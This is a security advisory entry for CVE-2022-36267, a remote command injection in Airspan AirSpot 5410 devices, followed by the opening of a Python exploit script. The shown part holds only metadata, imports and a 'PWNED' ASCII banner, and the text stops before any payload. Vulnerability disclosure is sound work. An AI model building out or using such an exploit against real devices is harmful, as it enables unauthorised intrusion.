AirSpot 5410 versions 0.3.4.1-4 and below suffer from an unauthenticated remote command injection vulnerability.
advisories | CVE-2022-36267
# -*- coding: utf-8 -*-
# Exploit Title: AirSpot unauthenticated remote command injection
# Date: 7/26/2022
# Exploit Author: Samy Younsi (NSLABS) (https://samy.link)
# Vendor Homepage: https://www.airspan.com/
# Software Link: https://wdi.rfwel.com/cdn/techdocs/AirSpot5410.pdf
# Version: 0.3.4.1-4 and under.
# Tested on: Airspan AirSpot 5410 version 0.3.4.1-4 (Ubuntu)
# CVE : CVE-2022-36267
from __future__ import print_function, unicode_literals
import argparse
import requests
import urllib3
urllib3.disable_warnings()
def banner():
airspanLogo = """
,-.
/ `. __..-,O
: --''_..-'.'
| . .-' `. '.
: . .`.'
`. / ..
`. ' .
`, `.
,|,`. `-.
'.|| ``-...__..-`
| | Airspan
|__| AirSpot 5410
/|| PWNED x_x
//||
// ||
__//__||____
'--------------'Necrum Security Labs